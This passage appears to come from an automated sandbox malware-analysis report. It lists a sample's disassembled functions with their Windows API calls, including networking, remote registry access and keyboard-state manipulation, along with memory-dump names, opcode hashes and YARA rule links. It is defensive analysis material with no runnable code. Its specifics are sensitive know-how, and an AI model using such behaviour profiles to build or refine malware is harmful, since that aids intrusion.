                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                    • API String ID: 3207048006-625585964
                                                                                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                    Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                    • _memmove.LIBCMT ref: 004656CA
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2945290962-0
                                                                                                                    • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                    • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                    Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1457242333-0
                                                                                                                    • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                    • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                    • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                    • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                    Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 15295421-0
                                                                                                                    • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                    • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                    • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                    • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                    Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 780548581-3081909835
                                                                                                                    • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                                    • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                    • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                                    • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                    Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                    • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                    • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                    • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                    • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                    • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                    • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                    • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4082120231-0
                                                                                                                    • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                    • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                    • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                    • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                    Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                    • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2027346449-0
                                                                                                                    • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                    • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                    • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                    • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                    Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                    • GetMenu.USER32 ref: 0047A703
                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                    • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                    • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                    • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                    • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3257027151-0
                                                                                                                    • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                    • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                    Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastselect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 215497628-0
                                                                                                                    • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                    • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                    • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                    • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                    Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 0044443B
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                    • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                    • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                    • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                    Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00444633
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                    • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                    • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                    • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                    Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2354583917-0
                                                                                                                    • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
